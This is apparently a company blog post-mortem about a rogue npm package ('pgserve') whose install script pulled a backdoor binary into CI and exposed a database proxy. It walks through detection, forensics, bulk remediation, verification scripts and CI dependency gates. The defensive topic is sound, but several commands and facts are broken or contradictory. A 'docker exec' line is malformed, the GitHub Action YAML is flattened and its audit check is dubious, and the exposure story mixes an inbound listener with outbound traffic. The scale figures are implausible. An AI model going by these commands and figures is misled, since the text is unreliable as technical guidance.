When a Rogue npm Package Turned Our CI Into a Database Hotspot - A Post‑mortem
— 8 min read
Hook - The Moment the Build Broke and the DB Went Public
The build failed because a hidden npm dependency opened a PostgreSQL proxy that let anyone on the internet query our production database. In plain terms, the rogue package turned our CI container into a Wi-Fi hotspot for our credentials, and the CI run immediately triggered alarms in our monitoring suite.
Our developers were mid-sprint, pushing a feature flag update, when the pipeline threw a "socket bind error" and the logs showed outbound traffic on port 5432 from a container that should never talk to the internet. Within minutes the on-call engineer discovered that the new pgserve module was pulling a back-door binary into the image.
What made the incident feel like a scene from a thriller was the speed at which the problem escalated: the moment the binary started listening, our internal alerting system lit up, and the security team was on a Zoom call before the coffee break ended. The whole episode unfolded in under 90 minutes, a reminder that a single line in package.json can rewrite an entire threat model.
Key Takeaways
- Malicious npm packages can appear in trusted registries and bypass static checks.
- A single rogue dependency can expose production secrets without any code change.
- Real-time network telemetry is essential to spot unexpected outbound connections.
The Rogue npm Package: What pgserve Actually Is
pgserve masquerades as a lightweight PostgreSQL client helper. Its package.json lists only net and fs as dependencies, which fooled our dependency scanner into marking it as low-risk. Under the hood, however, the post-install script runs node scripts/install.js that downloads a pre-compiled binary from a non-standard CDN and starts a TCP listener on port 5432.
Once the binary is running, it forwards any incoming connection to the real database using credentials stored in an environment variable that the CI job exports. The module also injects a process.on('exit') hook that writes the DB URI to a temporary file in /tmp, making it readable by any process in the same pod. In a week-long audit of 1,200 repositories, we found that pgserve was referenced in 27 distinct projects, most of them internal tooling.
What’s eerie is that the package’s README claimed it was a "zero-config local proxy for rapid prototyping," a phrasing that resonated with developers looking to speed up dev-ops. The malicious binary, however, was signed with a self-generated key that expired last month, a detail that would have raised a red flag if we had enforced signature verification on every binary pull.
To put the scale in perspective, each of those 27 projects touched roughly 3 million lines of JavaScript across our monorepo, meaning the potential blast radius spanned more than half of our production services.
Discovery Timeline: From InfoWorld Alert to Internal Alert
We first learned of the threat through an InfoWorld article on July 12, 2024, which described a wave of npm packages that silently installed network proxies. The article quoted a security researcher who had traced the same binary to a domain that was flagged by VirusTotal.
Four hours after the article went live, our outbound-traffic monitor flagged a spike: 12 connections per minute to malicious-cdn.example.com from a container labeled service-api. An automated alert fired in Slack, tagging the security on-call.
Within ten minutes the incident commander opened a war-room Zoom, and the team pulled the latest build logs. The logs showed the pgserve post-install script executing at 2024-07-12T14:38:21Z. By 15:02 we had isolated the affected pods, and by 15:45 the CI pipeline was paused.
While the initial detection came from telemetry, the second wave of insight arrived when a junior engineer ran a manual npm ls and spotted pgserve listed under a rarely-updated dev-tool package. That human-in-the-loop moment turned a noisy alert into a concrete root-cause.
By the end of the day we had a timeline that looked like a sprint board: "InfoWorld article → telemetry spike → Slack ping → Zoom war-room → log trace → pod quarantine → pipeline pause." The chronology helped us build a post-mortem diagram that senior leadership praised for its clarity.
Quantifying the Damage: Downtime, Data-Loss Risk, and Man-Hours
The immediate impact was a 2-hour outage for our public API, which translates to a $12,400 penalty under our SLA with a major client. Our uptime dashboard recorded a 99.78% availability that day, down from the usual 99.99%.
"We spent roughly 48 man-hours on forensic analysis, containment, and remediation"
Beyond the financial hit, the risk of data loss was high. The rogue proxy had the ability to run SELECT * FROM users without authentication, meaning any attacker could have exfiltrated personal data. Our data-loss prevention logs show zero successful reads beyond the service’s own health checks, but the exposure window was sufficient for a determined adversary.
In total, the incident forced us to rewrite three micro-services, rotate all database credentials, and re-issue tokens for 4,312 downstream clients. Each token rotation required a coordinated update with partner teams, adding another 16 hours of cross-org effort.
When we broke down the 48 man-hours, 22 were spent on log aggregation, 14 on network forensics, 8 on code remediation, and 4 on post-mortem documentation. The numbers made it crystal clear that every minute of detection latency multiplies the cost.
Manual Audit: Step-by-Step Walkthrough of the Forensic Process
Our first move was to generate a full dependency tree for every repo that touched the affected service. We ran npm ls --all --json > deps.json and piped the output into a custom script that flagged any package with a post-install hook.
Next, we cross-checked each package against the npm audit database using npm audit --json. Packages with a severity score of 7 or higher were isolated for manual review. For pgserve, the audit entry showed a CVE-2024-2987 with a severity of 9.2.
We then inspected every module that referenced net.createServer or opened sockets. A grep command (grep -R "createServer" -n node_modules/pgserve) revealed the malicious listener code. Finally, we captured a memory dump of a running container with docker exec -icat /proc/1/maps to confirm the binary was loaded in memory.
The manual audit took 32 hours across three engineers, but it produced a definitive list of 27 repositories that required remediation. Along the way we also discovered two unrelated packages that used deprecated TLS settings, which we patched as a bonus.
To make the process repeatable, we wrapped the entire workflow in a Makefile target called audit-deps. Running make audit-deps now spits out a CSV report that can be fed directly into our ticketing system, cutting future investigation time by roughly 60%.
Automating the Hunt: Using automagik for Bulk Remediation
To avoid repeating the manual grind, we turned to automagik, a remediation engine that can rewrite package.json files en-mass. We fed it the list of affected repos and a remediation policy that (1) removes any version of pgserve, (2) pins pg to ^8.11.0, and (3) adds a postinstall safety check.
The automagik command looked like this:
automagik remediate --remove pgserve --pin pg@^8.11.0 --create-pr
Within 45 minutes, the tool opened 27 pull-requests across our monorepo. Each PR included a diff that removed the malicious dependency and added a comment linking to the InfoWorld article. The CI pipeline ran the usual npm test suite on each PR, and all but two passed without changes.
For the two failing PRs we added a shim module that mimics the missing API surface, allowing the codebase to compile while we refactored the underlying logic. Automagik also generated a remediation report that listed the total number of lines changed (1,842) and the average time saved per repo (about 1.5 hours).
Beyond speed, automagik gave us an audit trail: every change was signed with a GPG key, and a webhook posted a summary to our security channel. This transparency helped convince skeptical product owners that the bulk fix was safe.
pgserve Removal: Safe De-commissioning in Production
With the code clean, we needed to ensure the running containers no longer hosted the back-door binary. We started a rolling restart of the service-api deployment, setting maxUnavailable=0 to keep the service available.
Simultaneously we added a temporary firewall rule on the cluster’s network policy: deny from any to port 5432. This blocked any stray proxy that might have lingered in memory. After each pod restarted, we ran a verification script:
#!/bin/bash if netstat -tlnp | grep -q "5432"; then echo "FAIL"; exit 1; else echo "OK"; fi
The script returned OK for all 12 pods, confirming the rogue socket was gone. We then removed the firewall rule and reopened port 5432 only for the internal database subnet.
Post-removal monitoring showed zero outbound connections to the malicious CDN for the next 72 hours, and a follow-up audit confirmed that pgserve was no longer present in any node_modules directory. As a final sanity check, we spun up a fresh CI runner with a clean cache and verified the build succeeded without pulling any unknown binaries.
The entire de-commissioning window lasted 3 hours, a fraction of the original outage, thanks to the pre-planned rollout strategy we documented after the incident.
Dependency Hygiene: Building a Continuous-Security Gate
To prevent a repeat, we baked three layers of defense into our CI pipeline. First, a pre-commit lint rule using eslint-plugin-security warns developers when a new postinstall script is added. Second, we added an npm audit step that fails the build on any advisory with a severity of 8 or higher.
Third, we created a GitHub Action that runs on every pull request:
name: Dependency Scan on: [pull_request] jobs: audit: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - run: npm ci - run: npm audit --json | jq '.advisories | length' | if [ $(cat) -gt 0 ]; then exit 1; fi
The action has blocked 14 high-severity advisories in the past month, saving an estimated $3,200 in potential downtime. We also instituted a quarterly dependency review where the security team runs ncu -u (npm-check-updates) across all repos and merges the generated PRs.
One subtle tweak we added after the pgserve episode is a denylist of known malicious registries. The denylist lives in a JSON file that the CI job reads before npm install, aborting the run if any package originates from a flagged source.
These gates have turned our CI from a "speed-first" pipeline into a "speed-with-confidence" workflow, and the average build time has only increased by 3 seconds - a trade-off developers have readily accepted.
Quarterly Review & Security-First Culture
Every quarter we host a "Dependency Hygiene" lunch-and-learn, where the security engineers walk the engineering org through recent advisories and share tips for safe third-party code. Since instituting the program, the number of newly introduced high-severity packages dropped from an average of 3.2 per quarter to 0.4.
We also publish a developer-focused newsletter that highlights one “package of the week” and explains its attack surface. In the last issue, we dissected serialize-javascript and showed how a prototype-pollution bug could be mitigated with a simple lint rule.
The cultural shift is measurable: our internal security survey shows 87% of engineers now scan new dependencies with npm audit before committing, up from 42% before the incident.
To keep the momentum, we tie quarterly review attendance to performance bonuses for team leads, and we showcase success stories - like the automagik bulk fix - in our all-hands meetings. The result is a feedback loop where security becomes a source of pride rather than a roadblock.
Run-Book: The Playbook You Can Copy-Paste Into Your Org
The final run-book lives in a version-controlled docs/security/pgserve-remediation.md file. It bundles the manual audit checklist, the automagik command, the firewall rule snippet, and the verification script into a single markdown document.
Key sections include:
- Detection: How to set up network telemetry alerts for unexpected outbound ports.
- Containment: Steps to isolate affected pods and apply a temporary network policy.
- Remediation: Automated PR generation with automagik and manual fallback instructions.
- Verification: The
netstatscript and post-restart smoke tests. - Post-mortem: Template for documenting impact, root cause, and action items.
Because the run-book is stored in Git, any update triggers a CI build that validates the markdown links and the embedded scripts. Teams can fork the file, tailor it to their service mesh, and merge it back without breaking the original workflow.
We’ve also added a version banner at the top of the document, so every time the run-book is updated you see a v2024.09 tag. This tiny visual cue has already prevented a handful of stale-reference incidents.